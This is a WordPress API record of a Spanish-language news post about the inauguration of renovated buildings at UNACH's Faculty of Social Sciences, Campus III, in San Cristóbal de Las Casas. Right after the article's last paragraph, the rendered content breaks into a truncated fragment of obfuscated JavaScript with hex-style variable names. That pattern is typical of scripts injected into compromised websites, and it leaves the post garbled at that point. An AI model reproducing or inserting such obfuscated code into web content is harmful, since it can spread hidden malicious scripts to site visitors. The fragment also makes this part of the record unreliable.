{"id":23775,"date":"2025-09-05T03:12:24","date_gmt":"2025-09-05T03:12:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23775"},"modified":"2025-09-05T03:12:24","modified_gmt":"2025-09-05T03:12:24","slug":"inauguran-nuevas-obras-en-la-facultad-de-ciencias-sociales-de-la-unach-campus-iii","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23775","title":{"rendered":"Inauguran nuevas obras en la Facultad de Ciencias Sociales de la UNACH, Campus III"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"23776\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316079-1024x768.jpg\" alt=\"\" class=\"wp-image-23776\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316079-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316079-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316079-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316079-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316079.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"23777\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316077-768x1024.jpg\" alt=\"\" class=\"wp-image-23777\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316077-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316077-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316077-1152x1536.jpg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316077.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"23780\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316074-1024x768.jpg\" alt=\"\" class=\"wp-image-23780\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316074-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316074-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316074-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316074-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316074.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"23779\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316066-1024x768.jpg\" alt=\"\" class=\"wp-image-23779\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316066-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316066-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316066-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316066-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316066.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"23778\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316071-768x1024.jpg\" alt=\"\" class=\"wp-image-23778\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316071-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316071-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316071-1152x1536.jpg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000316071.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 04 de septiembre de 2025.- La presidenta municipal, Mtra. Fabiola Ricci Diestel, acompa\u00f1\u00f3 al Gobernador de Chiapas, Dr. Eduardo Ram\u00edrez Aguilar, al rector de la UNACH, Dr. Oswaldo Chac\u00f3n Rojas, y al director del INIFECH, Carlos Idelfonso Jim\u00e9nez Trujillo, a la inauguraci\u00f3n de las obras de modernizaci\u00f3n de la Facultad de Ciencias Sociales, Campus III, en esta ciudad.<\/p>\n\n\n\n<p>El proyecto incluy\u00f3 la construcci\u00f3n de un nuevo edificio de dos niveles, la rehabilitaci\u00f3n de 12 inmuebles, as\u00ed como la creaci\u00f3n de un domo para la plaza c\u00edvica, andadores, rampas, cisterna, redes de servicios y equipamiento con mobiliario y equipo de c\u00f3mputo. Estas acciones buscan responder al incremento de la matr\u00edcula y mejorar las condiciones acad\u00e9micas de la comunidad universitaria.<\/p>\n\n\n\n<p>Con esta inversi\u00f3n se beneficiar\u00e1n directamente 505 alumnos, 58 docentes y personal administrativo, adem\u00e1s de haberse generado empleos en distintos oficios durante el desarrollo de la obra. La renovaci\u00f3n de espacios representa un paso importante para garantizar educaci\u00f3n de calidad y fortalecer la formaci\u00f3n de futuros profesionistas en la regi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas, 04 de septiembre de 2025.- La presidenta municipal, Mtra. Fabiola Ricci Diestel, acompa\u00f1\u00f3 al Gobernador de Chiapas, Dr. Eduardo Ram\u00edrez Aguilar, al rector de la UNACH, Dr. Oswaldo Chac\u00f3n Rojas, y al director del INIFECH, Carlos Idelfonso Jim\u00e9nez Trujillo, a la inauguraci\u00f3n de las obras de modernizaci\u00f3n de la Facultad &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23777,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23775","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23775","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23775"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23775\/revisions"}],"predecessor-version":[{"id":23781,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23775\/revisions\/23781"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23777"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23775"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23775"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23775"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}